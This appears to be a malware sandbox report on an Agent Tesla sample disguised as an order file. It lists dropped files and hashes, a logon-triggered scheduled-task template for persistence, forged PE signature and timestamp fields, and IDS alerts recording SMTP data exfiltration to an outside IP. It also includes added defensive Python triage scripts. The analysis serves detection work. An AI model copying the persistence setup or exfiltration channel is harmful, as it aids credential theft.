                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Reputation: high, very likely benign file
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2232
Entropy (8bit): 5.380747059108785
Encrypted: false
SSDEEP: 48:lylWSU4y4RYdmloUeW+gZ9tK8NPZHUxL7u1iMuge//8PUyus:lGLHyIYMqLgZ2KRHWLOug8s
MD5: A27B7CA90E61EEC84C0C0E050061F472
SHA1: DD1171C73F02B27802B9DED0C77D6A183EC72ECD
SHA-256: 8F2FE3AEF20EF463680BA917947BDB518A52321F861792A2C41403A4EDEDA780
SHA-512: 967E83A6A2E4045DC91AB541BE4E733F6F64322450F719E5A1192836660A112C6526537E0B1369976192AC84634E29E00B87EC46522721F1A5E273D731B7EAE2
Malicious: false
                                                                            Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............i..VdqF...|...........System.Configuration<................t.,.lG....M...........System.Management...4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
Identical entries:7 more (same process, size, hashes and preview as the entry above; powershell.exe writes this 60-byte AppLocker lockdown-mode probe every time it starts, so one copy appears per PowerShell invocation and none of them is attacker output)
                                                                            Process:C:\Users\user\Desktop\Order 19A20060.exe
                                                                            File Type:XML 1.0 document, ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):1579
                                                                            Entropy (8bit):5.115435852371399
                                                                            Encrypted:false
                                                                            SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtacxvn:cge1wYrFdOFzOzN33ODOiDdKrsuT3v
                                                                            MD5:B8FBFF41A625F1B0F19D2882677F4EFE
                                                                            SHA1:6457479245995AA598E70D9EF626566DB19D052E
                                                                            SHA-256:46FE71F216F64875B374BDCDA086B8F33D6BD49BF0EB010B3E3C8E26F1AC4E7C
                                                                            SHA-512:B5E2DCE8628AF57CD25726247D375852D99BACA73043662A1486ACB7B18F6583DFBCCEC4EEEECB0E1A5BD05CF14DCD636D9013F5A466F60B8209CAEA90564F48
                                                                            Malicious:true
                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                            Process:C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                                            File Type:XML 1.0 document, ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):1579
                                                                            Entropy (8bit):5.115435852371399
                                                                            Encrypted:false
                                                                            SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtacxvn:cge1wYrFdOFzOzN33ODOiDdKrsuT3v
                                                                            MD5:B8FBFF41A625F1B0F19D2882677F4EFE
                                                                            SHA1:6457479245995AA598E70D9EF626566DB19D052E
                                                                            SHA-256:46FE71F216F64875B374BDCDA086B8F33D6BD49BF0EB010B3E3C8E26F1AC4E7C
                                                                            SHA-512:B5E2DCE8628AF57CD25726247D375852D99BACA73043662A1486ACB7B18F6583DFBCCEC4EEEECB0E1A5BD05CF14DCD636D9013F5A466F60B8209CAEA90564F48
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
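The task definition above is the persistence mechanism the "Scheduled temp file as task from temp location" signature fires on: a logon trigger for the current user, registered by passing an XML file to schtasks. The visible fields already give a triage analyst enough to key on (a RegistrationInfo date from 2014 that predates the file by years, an author of `user-PC\user`, `AllowHardTerminate` set to false), and the declaration says UTF-16 while the file is plain ASCII. The following is an added example, not Joe Sandbox's code or anything taken from the sample: the two task definitions are constructed, the first reproducing the fields shown above plus a hypothetical `<Actions>` block (the report's preview is cut off before that element, so the real command is unknown), the second a benign-looking comparison; the observation time is likewise constructed.

```python
"""Triage of Task Scheduler XML definitions like the one dropped above (added example)."""
import re
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Path fragments that place an action under a user-writable directory (lower-cased match)
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")

# Constructed: the fields visible in the report plus a hypothetical Actions element.
MALICIOUS_TASK_XML = b'''<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>user-PC\\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>user-PC\\user</UserId>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>user-PC\\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\user\\AppData\\Roaming\\updater.exe</Command>
    </Exec>
  </Actions>
</Task>'''

# Constructed: a benign-looking task for comparison.
BENIGN_TASK_XML = b'''<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2024-01-10T09:00:00</Date>
    <Author>CONTOSO\\svc-backup</Author>
  </RegistrationInfo>
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2024-01-10T22:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Settings>
    <AllowHardTerminate>true</AllowHardTerminate>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Program Files\\Vendor\\backup.exe</Command>
    </Exec>
  </Actions>
</Task>'''

OBSERVED = datetime(2024, 1, 20, 12, 0, 0)  # constructed time the file was collected


def load_task(raw: bytes) -> ET.Element:
    """Parse a task XML, deciding the encoding from the bytes rather than the declaration.

    The dropped file declares UTF-16 but is ASCII; trusting the declaration would fail.
    """
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        text = raw.decode("utf-16")
    else:
        text = raw.decode("utf-8")
    text = re.sub(r"^\s*<\?xml[^>]*\?>", "", text)  # drop the possibly wrong declaration
    return ET.fromstring(text)


def triage_task(raw: bytes, observed: datetime) -> list:
    """Return the persistence indicators present in one task definition."""
    task = load_task(raw)
    findings = []
    for trig in task.findall("t:Triggers/t:LogonTrigger", NS):
        if (trig.findtext("t:Enabled", "true", NS) or "").lower() == "true":
            findings.append("logon trigger: runs at every interactive logon")
    for cmd in task.findall("t:Actions/t:Exec/t:Command", NS):
        path = (cmd.text or "").lower()
        if any(part in path for part in USER_WRITABLE):
            findings.append("action runs from a user-writable path: %s" % cmd.text)
    date_text = task.findtext("t:RegistrationInfo/t:Date", None, NS)
    if date_text:
        # Task Scheduler writes seven fractional digits; strptime wants at most six, so cut them.
        registered = datetime.strptime(date_text[:19], "%Y-%m-%dT%H:%M:%S")
        if observed - registered > timedelta(days=365):
            findings.append("registration date %s is years older than the file: embedded template"
                            % date_text[:10])
    if (task.findtext("t:Settings/t:AllowHardTerminate", "true", NS) or "").lower() == "false":
        findings.append("AllowHardTerminate=false: Task Scheduler will not kill the process")
    return findings


if __name__ == "__main__":
    for label, xml in (("dropped task", MALICIOUS_TASK_XML), ("comparison task", BENIGN_TASK_XML)):
        print(label, triage_task(xml, OBSERVED))
```

The same function works on exports from a live host (`schtasks /Query /XML /TN <name>` writes UTF-16 with a BOM, which `load_task` handles), so it can be run over every task on a box during incident response rather than on one dropped file.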
                                                                            Process:C:\Users\user\Desktop\Order 19A20060.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):717832
                                                                            Entropy (8bit):7.969051173968409
                                                                            Encrypted:false
                                                                            SSDEEP:12288:LKbUmJCQ7VRKSynEJFuR6g28pXYC5kBB+Fh+YDliuXci7o/zrj68p+zBh3HG8kR:LKbUnQBcSynEJF428pB5kBX+liuXL8/X
                                                                            MD5:3C162B1CAA9B65084775199AF23B06DE
                                                                            SHA1:4B401EEBFAB0A021D242CE7A1FF9C044D9813D10
                                                                            SHA-256:5857B336D7D9853E12A8396380A452B1EA5C390A0409FB58EE6E7E77D9AABE00
                                                                            SHA-512:4850ECC0EF5E1FB17879454E1A6B52DF6443D2C53488701CCF96AF33E254071875EC8DBE5C07307B8135B156479E21DB186E0D88CF9D07521116D51C3F54597A
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 68%
                                                                            • Antivirus: Virustotal, Detection: 38%, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.................. ........@.. ....................... ............@.....................................O........................6..............p............................................ ............... ..H............text...<.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........R..xN..........p...8...........................................^..}.....(.......(.....*.0..+.........,..{.......+....,...{....o........(.....*..0................(....s .....s!...}.....s!...}.....s!...}.....s!...}.....s"...}.....s"...}.....s#...}.....s"...}.....s"...}.....s"...}.....s"...}.....{....o$.....(%.....{.....o&.....{......o'.....{....((...o).....{....r...p"...A...s*...o+.....{.....>.>.>(,...o-.....{.... .... ....s....o/.....{........s0...o1.....{....r...po2.
                                                                            Process:C:\Users\user\Desktop\Order 19A20060.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:false
                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):7.969051173968409
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                            File name:Order 19A20060.exe
                                                                            File size:717'832 bytes
                                                                            MD5:3c162b1caa9b65084775199af23b06de
                                                                            SHA1:4b401eebfab0a021d242ce7a1ff9c044d9813d10
                                                                            SHA256:5857b336d7d9853e12a8396380a452b1ea5c390a0409fb58ee6e7e77d9aabe00
                                                                            SHA512:4850ecc0ef5e1fb17879454e1a6b52df6443d2c53488701ccf96af33e254071875ec8dbe5c07307b8135b156479e21db186e0d88cf9d07521116d51c3f54597a
                                                                            SSDEEP:12288:LKbUmJCQ7VRKSynEJFuR6g28pXYC5kBB+Fh+YDliuXci7o/zrj68p+zBh3HG8kR:LKbUnQBcSynEJF428pB5kBX+liuXL8/X
                                                                            TLSH:0FE4231853A9D362CEF6CB36167D32034B72728AA821FE565ED672E74685B400F0397F
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................... ............@................................
                                                                            Icon Hash:90cececece8e8eb0
                                                                            Entrypoint:0x4ad21e
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:true
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0xC0ACD5FF [Tue Jun 7 19:14:07 2072 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                            Signature Valid:false
                                                                            Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                            Error Number:-2146869232
                                                                            Not Before, Not After
                                                                            • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                            Subject Chain
                                                                            • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                            Version:3
                                                                            Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                            Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                            Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                            Serial:7C1118CBBADC95DA3752C46E47A27438
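Two of the static fields above deserve a second look when triaging by hand. "Digitally signed:true" only records that a security directory (an Authenticode blob) is present; "Signature Valid:false" with a subject of Simon Tatham, the PuTTY author, is consistent with a signature block copied from a signed PuTTY release, which is why it does not verify against this file. The compile timestamp of 2072 is the "suspicious time stamp" signature; a future date is a strong hint on its own, with the caveat that deterministic .NET builds store a hash in that field, so it has to be weighed together with the invalid signature and the other findings. The following is an added example, not Joe Sandbox's code: it reads those fields straight from the PE headers and applies the checks. The minimal PE32 header it parses is constructed from the report's values (entry point, image base, DllCharacteristics, timestamp); the directory offsets and the 0x1800-byte blob size are invented, since the report does not give them.

```python
"""Static triage of the PE-header fields listed in the report (added example)."""
import struct
from datetime import datetime, timedelta, timezone
from typing import Optional

# DllCharacteristics bits, in the order the report lists them
DLL_CHARACTERISTICS = {
    0x0040: "DYNAMIC_BASE",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x8000: "TERMINAL_SERVER_AWARE",
}
DIR_SECURITY = 4          # Authenticode blob (this entry holds a file offset, not an RVA)
DIR_COM_DESCRIPTOR = 14   # CLR header; a non-zero size means a .NET assembly


def build_sample_pe(timestamp: int, security_size: int, clr_size: int = 72) -> bytes:
    """Construct a minimal PE32 header carrying the report's values (test data, not the real file)."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                # e_lfanew -> PE signature
    # PE\0\0 + COFF header: i386, 3 sections, TimeDateStamp, no symbols,
    # 224-byte optional header, EXECUTABLE_IMAGE | 32BIT_MACHINE
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", 0x14C, 3, timestamp, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                  # Magic: PE32
    struct.pack_into("<I", opt, 16, 0x4AD21E - 0x400000)   # AddressOfEntryPoint (RVA)
    struct.pack_into("<I", opt, 28, 0x400000)              # ImageBase
    struct.pack_into("<HH", opt, 40, 4, 0)                 # OS version 4.0
    struct.pack_into("<HH", opt, 48, 4, 0)                 # Subsystem version 4.0
    struct.pack_into("<HH", opt, 68, 2, 0x8540)            # Subsystem GUI; DllCharacteristics
    struct.pack_into("<I", opt, 92, 16)                    # NumberOfRvaAndSizes
    # Directory offsets below are invented; only the sizes matter to the checks.
    struct.pack_into("<II", opt, 96 + 8 * DIR_SECURITY, 0xAE000, security_size)
    struct.pack_into("<II", opt, 96 + 8 * DIR_COM_DESCRIPTOR, 0x2008, clr_size)
    return bytes(dos) + coff + bytes(opt)


def parse_pe(data: bytes) -> dict:
    """Read the COFF and optional-header fields the triage needs (PE32 and PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, _nsect, timestamp, _, _, _opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional-header magic 0x%x" % magic)
    dirs = opt + (96 if magic == 0x10B else 112)   # data directories start later in PE32+
    subsystem, dllchars = struct.unpack_from("<HH", data, opt + 68)
    sec_off, sec_size = struct.unpack_from("<II", data, dirs + 8 * DIR_SECURITY)
    clr_rva, clr_size = struct.unpack_from("<II", data, dirs + 8 * DIR_COM_DESCRIPTOR)
    return {
        "machine": machine,
        "timestamp": timestamp,
        "subsystem": subsystem,
        "dll_characteristics": [n for bit, n in sorted(DLL_CHARACTERISTICS.items()) if dllchars & bit],
        "security_directory": (sec_off, sec_size),
        "clr_header": (clr_rva, clr_size),
    }


def timestamp_utc(ts: int) -> datetime:
    """TimeDateStamp is seconds since the Unix epoch; add to the epoch so 2072 works on every platform."""
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=ts)


def triage(data: bytes, now: Optional[datetime] = None):
    """Return (parsed fields, list of findings) for one file."""
    info = parse_pe(data)
    now = now or datetime.now(timezone.utc)
    built = timestamp_utc(info["timestamp"])
    findings = []
    if built > now:
        findings.append("timestamp in the future (%s UTC): forged, or a deterministic-build hash"
                        % built.strftime("%Y-%m-%d %H:%M:%S"))
    elif built < datetime(2000, 1, 1, tzinfo=timezone.utc):
        findings.append("timestamp implausibly old (%s UTC)" % built.strftime("%Y-%m-%d"))
    if info["security_directory"][1]:
        findings.append("Authenticode blob present: verify the chain and the file hash, "
                        "presence is not validity")
    if info["clr_header"][1]:
        findings.append(".NET assembly (CLR header present): the native entry stub is only a "
                        "jmp to _CorExeMain, analyse the IL")
    if "DYNAMIC_BASE" not in info["dll_characteristics"]:
        findings.append("ASLR not opted in")
    return info, findings


if __name__ == "__main__":
    fields, notes = triage(build_sample_pe(0xC0ACD5FF, 0x1800))
    print(fields)
    for note in notes:
        print("-", note)
```

On a real file, `parse_pe(open(path, "rb").read())` is all that changes; the checks are deliberately limited to header fields so they run on a quarantined sample without loading or executing anything from it.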
Instruction (at entry point 0x4ad21e: the standard .NET PE32 native stub, an unconditional jmp through the IAT slot at 0x402000 to mscoree!_CorExeMain; the bytes after it are never executed, so the instructions decoded from them below are data, not code)
jmp dword ptr [00402000h]
                                                                            xor al, 47h
                                                                            xor al, 51h
                                                                            aaa
                                                                            cmp byte ptr [ecx+49h], al
                                                                            inc edi
                                                                            xor al, 50h
                                                                            xor bl, byte ptr [ecx+34h]
                                                                            aaa
                                                                            cmp byte ptr [32383847h], dh
                                                                            xor eax, 00000000h
                                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xad1ca | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xae000 | 0x5ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xabe00 | 0x3608 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xab5a8 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xab23c | 0xab400 | 86c846b00fbc199a5e30b8d96e654635 | False | 0.9693601733576642 | data | 7.974500592117059 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xae000 | 0x5ac | 0x600 | 6d4bbf58f0a6d34c073ae2063640d08d | False | 0.4212239583333333 | data | 4.085549072640651 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb0000 | 0xc | 0x200 | ae82923f53b11b09a83f3a48e6d4f19b | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xae090 | 0x31c | data | | | 0.4334170854271357
RT_MANIFEST | 0xae3bc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347

DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/27/24-10:09:05.706606 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49739 | 587 | 192.168.2.4 | 50.87.139.143
02/27/24-10:09:05.706606 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49739 | 587 | 192.168.2.4 | 50.87.139.143
02/27/24-10:09:05.706606 | TCP | 2855245 | ETPRO TROJAN Agent Tesla Exfil via SMTP | 49739 | 587 | 192.168.2.4 | 50.87.139.143
02/27/24-10:09:05.706606 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49739 | 587 | 192.168.2.4 | 50.87.139.143
02/27/24-10:09:05.706606 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49739 | 587 | 192.168.2.4 | 50.87.139.143
02/27/24-10:09:03.953321 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49735 | 587 | 192.168.2.4 | 50.87.139.143
02/27/24-10:09:03.953263 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49735 | 587 | 192.168.2.4 | 50.87.139.143
02/27/24-10:09:03.953321 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49735 | 587 | 192.168.2.4 | 50.87.139.143
02/27/24-10:09:03.953321 | TCP | 2855245 | ETPRO TROJAN Agent Tesla Exfil via SMTP | 49735 | 587 | 192.168.2.4 | 50.87.139.143
02/27/24-10:09:03.953321 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49735 | 587 | 192.168.2.4 | 50.87.139.143
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 27, 2024 10:08:58.935795069 CET | 59246 | 53 | 192.168.2.4 | 1.1.1.1
